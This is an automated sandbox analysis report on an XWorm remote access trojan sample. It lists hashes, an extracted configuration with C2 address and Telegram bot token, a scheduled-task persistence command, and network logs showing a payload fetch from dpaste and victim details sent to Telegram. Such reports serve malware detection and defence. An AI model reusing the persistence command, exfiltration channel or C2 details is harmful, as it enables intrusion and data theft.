Analysis

  • max time kernel
    110s
  • max time network
    119s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64, arch:x86, image:win10v2004-20241007-en, locale:en-us, os:windows10-2004-x64, system
  • submitted
    21/01/2025, 05:48 UTC

General

  • Target

    84d354f7018370bba012bf66ed07844fb96f8f59884f1d102ef46794d650b450N.exe

  • Size

    9KB

  • MD5

    0df8781dad511830d4722e2f140f6c60

  • SHA1

    e69045c7a0270aff84dafcd813c05ffbb4c7a20c

  • SHA256

    84d354f7018370bba012bf66ed07844fb96f8f59884f1d102ef46794d650b450

  • SHA512

    653e7550359149b2e383b360a83f0e2bda7e1f14e2e23c8c7296e1c5f865bb83599d550b916c8d2dd6afbef072a17f119f03bc33c51cdf7ce9abb70caf24f3eb

  • SSDEEP

    192:kmGhMITEquCA/a1zbhQ5rycbXfrxQNsWkhbv8EFm/Q:km7rquN/a1zbIryePraXkhIl/

Malware Config

Extracted

Family

xworm

C2

147.185.221.25:18007

Attributes
  • Install_directory

    %AppData%

  • install_file

    svc.exe

  • telegram

    https://api.telegram.org/bot7958612105:AAHSNEPMuFgiaNh4WYBmEL8ysE2Ek6JH2i4/sendMessage?chat_id=8093935255

Signatures

  • Detect Xworm Payload 2 IoCs
  • Xworm

    Xworm is a remote access trojan written in C#.

  • Xworm family
  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 3 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

    Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.

  • Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious use of AdjustPrivilegeToken 5 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Users\Admin\AppData\Local\Temp\84d354f7018370bba012bf66ed07844fb96f8f59884f1d102ef46794d650b450N.exe
    "C:\Users\Admin\AppData\Local\Temp\84d354f7018370bba012bf66ed07844fb96f8f59884f1d102ef46794d650b450N.exe"
    1⤵
    • Checks computer location settings
    • System Location Discovery: System Language Discovery
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:3240
    • C:\Users\Admin\AppData\Local\Temp\dropped.exe
      "C:\Users\Admin\AppData\Local\Temp\dropped.exe"
      2⤵
      • Checks computer location settings
      • Executes dropped EXE
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:396
      • C:\Windows\System32\schtasks.exe
        "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "svc" /tr "C:\Users\Admin\AppData\Roaming\svc.exe"
        3⤵
        • Scheduled Task/Job: Scheduled Task
        PID:4008
  • C:\Users\Admin\AppData\Roaming\svc.exe
    C:\Users\Admin\AppData\Roaming\svc.exe
    1⤵
    • Executes dropped EXE
    • Suspicious use of AdjustPrivilegeToken
    PID:2764
  • C:\Users\Admin\AppData\Roaming\svc.exe
    C:\Users\Admin\AppData\Roaming\svc.exe
    1⤵
    • Executes dropped EXE
    • Suspicious use of AdjustPrivilegeToken
    PID:4428

Network

  • flag-us
    DNS
    8.8.8.8.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    8.8.8.8.in-addr.arpa
    IN PTR
    Response
    8.8.8.8.in-addr.arpa
    IN PTR
    dns.google
  • flag-us
    DNS
    dpaste.com
    84d354f7018370bba012bf66ed07844fb96f8f59884f1d102ef46794d650b450N.exe
    Remote address:
    8.8.8.8:53
    Request
    dpaste.com
    IN A
    Response
    dpaste.com
    IN CNAME
    webapp-837091.pythonanywhere.com
    webapp-837091.pythonanywhere.com
    IN A
    35.173.69.207
  • flag-us
    GET
    https://dpaste.com/997T8TTWV.txt
    84d354f7018370bba012bf66ed07844fb96f8f59884f1d102ef46794d650b450N.exe
    Remote address:
    35.173.69.207:443
    Request
    GET /997T8TTWV.txt HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0
    Host: dpaste.com
    Connection: Keep-Alive
    Response
    HTTP/1.1 200 OK
    Date: Tue, 21 Jan 2025 05:48:21 GMT
    Content-Type: text/plain; charset=utf-8
    Content-Length: 165248
    Connection: keep-alive
    Vary: Accept-Encoding
    Vary: Cookie, origin
    X-Clacks-Overhead: GNU Terry Pratchett
    Server: PythonAnywhere
  • flag-us
    DNS
    232.168.11.51.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    232.168.11.51.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    133.130.81.91.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    133.130.81.91.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    207.69.173.35.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    207.69.173.35.in-addr.arpa
    IN PTR
    Response
    207.69.173.35.in-addr.arpa
    IN PTR
    ec2-35-173-69-207.compute-1.amazonaws.com
  • flag-us
    DNS
    136.32.126.40.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    136.32.126.40.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    167.173.78.104.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    167.173.78.104.in-addr.arpa
    IN PTR
    Response
    167.173.78.104.in-addr.arpa
    IN PTR
    a104-78-173-167.deploy.static.akamaitechnologies.com
  • flag-us
    DNS
    97.17.167.52.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    97.17.167.52.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    ip-api.com
    dropped.exe
    Remote address:
    8.8.8.8:53
    Request
    ip-api.com
    IN A
    Response
    ip-api.com
    IN A
    208.95.112.1
  • flag-us
    GET
    http://ip-api.com/line/?fields=hosting
    dropped.exe
    Remote address:
    208.95.112.1:80
    Request
    GET /line/?fields=hosting HTTP/1.1
    Host: ip-api.com
    Connection: Keep-Alive
    Response
    HTTP/1.1 200 OK
    Date: Tue, 21 Jan 2025 05:48:26 GMT
    Content-Type: text/plain; charset=utf-8
    Content-Length: 6
    Access-Control-Allow-Origin: *
    X-Ttl: 60
    X-Rl: 44
  • flag-us
    DNS
    1.112.95.208.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    1.112.95.208.in-addr.arpa
    IN PTR
    Response
    1.112.95.208.in-addr.arpa
    IN PTR
    ip-api.com
  • flag-us
    DNS
    api.telegram.org
    dropped.exe
    Remote address:
    8.8.8.8:53
    Request
    api.telegram.org
    IN A
    Response
    api.telegram.org
    IN A
    149.154.167.220
  • flag-nl
    GET
    https://api.telegram.org/bot7958612105:AAHSNEPMuFgiaNh4WYBmEL8ysE2Ek6JH2i4/sendMessage?chat_id=8093935255&text=%E2%98%A0%20%5BXWorm%20V5.3%5D%0D%0A%0D%0ANew%20Clinet%20:%20%0D%0ACD4BBD0C1490E06B5277%0D%0A%0D%0AUserName%20:%20Admin%0D%0AOSFullName%20:%20Microsoft%20Windows%2010%20Pro%0D%0AUSB%20:%20False%0D%0ACPU%20:%20Intel%20Core%20Processor%20(Broadwell)%0D%0AGPU%20:%20Microsoft%20Basic%20Display%20Adapter%20%0D%0ARAM%20:%20Error%0D%0AGroub%20:%20Tester
    dropped.exe
    Remote address:
    149.154.167.220:443
    Request
    GET /bot7958612105:AAHSNEPMuFgiaNh4WYBmEL8ysE2Ek6JH2i4/sendMessage?chat_id=8093935255&text=%E2%98%A0%20%5BXWorm%20V5.3%5D%0D%0A%0D%0ANew%20Clinet%20:%20%0D%0ACD4BBD0C1490E06B5277%0D%0A%0D%0AUserName%20:%20Admin%0D%0AOSFullName%20:%20Microsoft%20Windows%2010%20Pro%0D%0AUSB%20:%20False%0D%0ACPU%20:%20Intel%20Core%20Processor%20(Broadwell)%0D%0AGPU%20:%20Microsoft%20Basic%20Display%20Adapter%20%0D%0ARAM%20:%20Error%0D%0AGroub%20:%20Tester HTTP/1.1
    Host: api.telegram.org
    Connection: Keep-Alive
    Response
    HTTP/1.1 400 Bad Request
    Server: nginx/1.18.0
    Date: Tue, 21 Jan 2025 05:48:30 GMT
    Content-Type: application/json
    Content-Length: 73
    Connection: keep-alive
    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
    Access-Control-Allow-Origin: *
    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
  • flag-us
    DNS
    220.167.154.149.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    220.167.154.149.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    13.86.106.20.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    13.86.106.20.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    53.210.109.20.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    53.210.109.20.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    241.42.69.40.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    241.42.69.40.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    167.190.18.2.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    167.190.18.2.in-addr.arpa
    IN PTR
    Response
    167.190.18.2.in-addr.arpa
    IN PTR
    a2-18-190-167.deploy.static.akamaitechnologies.com
  • flag-us
    DNS
    60.153.16.2.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    60.153.16.2.in-addr.arpa
    IN PTR
    Response
    60.153.16.2.in-addr.arpa
    IN PTR
    a2-16-153-60.deploy.static.akamaitechnologies.com
  • flag-us
    DNS
    172.210.232.199.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    172.210.232.199.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    22.236.111.52.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    22.236.111.52.in-addr.arpa
    IN PTR
    Response
  • 35.173.69.207:443
    https://dpaste.com/997T8TTWV.txt
    tls, http
    84d354f7018370bba012bf66ed07844fb96f8f59884f1d102ef46794d650b450N.exe
    3.6kB
    174.2kB
    69
    130

    HTTP Request

    GET https://dpaste.com/997T8TTWV.txt

    HTTP Response

    200
  • 208.95.112.1:80
    http://ip-api.com/line/?fields=hosting
    http
    dropped.exe
    310 B
    347 B
    5
    4

    HTTP Request

    GET http://ip-api.com/line/?fields=hosting

    HTTP Response

    200
  • 149.154.167.220:443
    https://api.telegram.org/bot7958612105:AAHSNEPMuFgiaNh4WYBmEL8ysE2Ek6JH2i4/sendMessage?chat_id=8093935255&text=%E2%98%A0%20%5BXWorm%20V5.3%5D%0D%0A%0D%0ANew%20Clinet%20:%20%0D%0ACD4BBD0C1490E06B5277%0D%0A%0D%0AUserName%20:%20Admin%0D%0AOSFullName%20:%20Microsoft%20Windows%2010%20Pro%0D%0AUSB%20:%20False%0D%0ACPU%20:%20Intel%20Core%20Processor%20(Broadwell)%0D%0AGPU%20:%20Microsoft%20Basic%20Display%20Adapter%20%0D%0ARAM%20:%20Error%0D%0AGroub%20:%20Tester
    tls, http
    dropped.exe
    1.3kB
    6.7kB
    11
    12

    HTTP Request

    GET https://api.telegram.org/bot7958612105:AAHSNEPMuFgiaNh4WYBmEL8ysE2Ek6JH2i4/sendMessage?chat_id=8093935255&text=%E2%98%A0%20%5BXWorm%20V5.3%5D%0D%0A%0D%0ANew%20Clinet%20:%20%0D%0ACD4BBD0C1490E06B5277%0D%0A%0D%0AUserName%20:%20Admin%0D%0AOSFullName%20:%20Microsoft%20Windows%2010%20Pro%0D%0AUSB%20:%20False%0D%0ACPU%20:%20Intel%20Core%20Processor%20(Broadwell)%0D%0AGPU%20:%20Microsoft%20Basic%20Display%20Adapter%20%0D%0ARAM%20:%20Error%0D%0AGroub%20:%20Tester

    HTTP Response

    400
  • 147.185.221.25:18007
    dropped.exe
    260 B
    5
  • 147.185.221.25:18007
    dropped.exe
    260 B
    5
  • 147.185.221.25:18007
    dropped.exe
    260 B
    5
  • 147.185.221.25:18007
    dropped.exe
    260 B
    5
  • 8.8.8.8:53
    8.8.8.8.in-addr.arpa
    dns
    66 B
    90 B
    1
    1

    DNS Request

    8.8.8.8.in-addr.arpa

  • 8.8.8.8:53
    dpaste.com
    dns
    84d354f7018370bba012bf66ed07844fb96f8f59884f1d102ef46794d650b450N.exe
    56 B
    115 B
    1
    1

    DNS Request

    dpaste.com

    DNS Response

    35.173.69.207

  • 8.8.8.8:53
    232.168.11.51.in-addr.arpa
    dns
    72 B
    158 B
    1
    1

    DNS Request

    232.168.11.51.in-addr.arpa

  • 8.8.8.8:53
    133.130.81.91.in-addr.arpa
    dns
    72 B
    147 B
    1
    1

    DNS Request

    133.130.81.91.in-addr.arpa

  • 8.8.8.8:53
    207.69.173.35.in-addr.arpa
    dns
    72 B
    127 B
    1
    1

    DNS Request

    207.69.173.35.in-addr.arpa

  • 8.8.8.8:53
    136.32.126.40.in-addr.arpa
    dns
    72 B
    158 B
    1
    1

    DNS Request

    136.32.126.40.in-addr.arpa

  • 8.8.8.8:53
    167.173.78.104.in-addr.arpa
    dns
    73 B
    139 B
    1
    1

    DNS Request

    167.173.78.104.in-addr.arpa

  • 8.8.8.8:53
    97.17.167.52.in-addr.arpa
    dns
    71 B
    145 B
    1
    1

    DNS Request

    97.17.167.52.in-addr.arpa

  • 8.8.8.8:53
    ip-api.com
    dns
    dropped.exe
    56 B
    72 B
    1
    1

    DNS Request

    ip-api.com

    DNS Response

    208.95.112.1

  • 8.8.8.8:53
    1.112.95.208.in-addr.arpa
    dns
    71 B
    95 B
    1
    1

    DNS Request

    1.112.95.208.in-addr.arpa

  • 8.8.8.8:53
    api.telegram.org
    dns
    dropped.exe
    62 B
    78 B
    1
    1

    DNS Request

    api.telegram.org

    DNS Response

    149.154.167.220

  • 8.8.8.8:53
    220.167.154.149.in-addr.arpa
    dns
    74 B
    167 B
    1
    1

    DNS Request

    220.167.154.149.in-addr.arpa

  • 8.8.8.8:53
    13.86.106.20.in-addr.arpa
    dns
    71 B
    157 B
    1
    1

    DNS Request

    13.86.106.20.in-addr.arpa

  • 8.8.8.8:53
    53.210.109.20.in-addr.arpa
    dns
    72 B
    158 B
    1
    1

    DNS Request

    53.210.109.20.in-addr.arpa

  • 8.8.8.8:53
    241.42.69.40.in-addr.arpa
    dns
    71 B
    145 B
    1
    1

    DNS Request

    241.42.69.40.in-addr.arpa

  • 8.8.8.8:53
    167.190.18.2.in-addr.arpa
    dns
    71 B
    135 B
    1
    1

    DNS Request

    167.190.18.2.in-addr.arpa

  • 8.8.8.8:53
    60.153.16.2.in-addr.arpa
    dns
    70 B
    133 B
    1
    1

    DNS Request

    60.153.16.2.in-addr.arpa

  • 8.8.8.8:53
    172.210.232.199.in-addr.arpa
    dns
    74 B
    128 B
    1
    1

    DNS Request

    172.210.232.199.in-addr.arpa

  • 8.8.8.8:53
    22.236.111.52.in-addr.arpa
    dns
    72 B
    158 B
    1
    1

    DNS Request

    22.236.111.52.in-addr.arpa

MITRE ATT&CK Enterprise v15

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\svc.exe.log

    Filesize

    654B

    MD5

    2ff39f6c7249774be85fd60a8f9a245e

    SHA1

    684ff36b31aedc1e587c8496c02722c6698c1c4e

    SHA256

    e1b91642d85d98124a6a31f710e137ab7fd90dec30e74a05ab7fcf3b7887dced

    SHA512

    1d7e8b92ef4afd463d62cfa7e8b9d1799db5bf2a263d3cd7840df2e0a1323d24eb595b5f8eb615c6cb15f9e3a7b4fc99f8dd6a3d34479222e966ec708998aed1

  • C:\Users\Admin\AppData\Local\Temp\dropped.exe

    Filesize

    60KB

    MD5

    3e9e3e8558100fe6532454253899a35c

    SHA1

    780a48407f1cdcc4f485077775e032e0322eaaad

    SHA256

    7be4bfd44ef825613565447e94c63af4e359221417babb5577fae8a62b683541

    SHA512

    e5c4dc9aa37c6d82a069a0edcc8537604f1440eb003a5d2b21aa103497b17ae80a48bb881e64a0010a9a45b481824be8f51dfdbe071b33cd316cc23a70379051

  • memory/396-15-0x00007FFA99F63000-0x00007FFA99F65000-memory.dmp

    Filesize

    8KB

  • memory/396-17-0x0000000000BF0000-0x0000000000C06000-memory.dmp

    Filesize

    88KB

  • memory/396-19-0x00007FFA99F60000-0x00007FFA9AA21000-memory.dmp

    Filesize

    10.8MB

  • memory/396-21-0x00007FFA99F60000-0x00007FFA9AA21000-memory.dmp

    Filesize

    10.8MB

  • memory/3240-0-0x000000007492E000-0x000000007492F000-memory.dmp

    Filesize

    4KB

  • memory/3240-1-0x0000000000950000-0x0000000000958000-memory.dmp

    Filesize

    32KB

  • memory/3240-2-0x00000000058B0000-0x0000000005E54000-memory.dmp

    Filesize

    5.6MB

  • memory/3240-3-0x0000000074920000-0x00000000750D0000-memory.dmp

    Filesize

    7.7MB

  • memory/3240-16-0x0000000006860000-0x00000000068F2000-memory.dmp

    Filesize

    584KB

  • memory/3240-18-0x0000000074920000-0x00000000750D0000-memory.dmp

    Filesize

    7.7MB
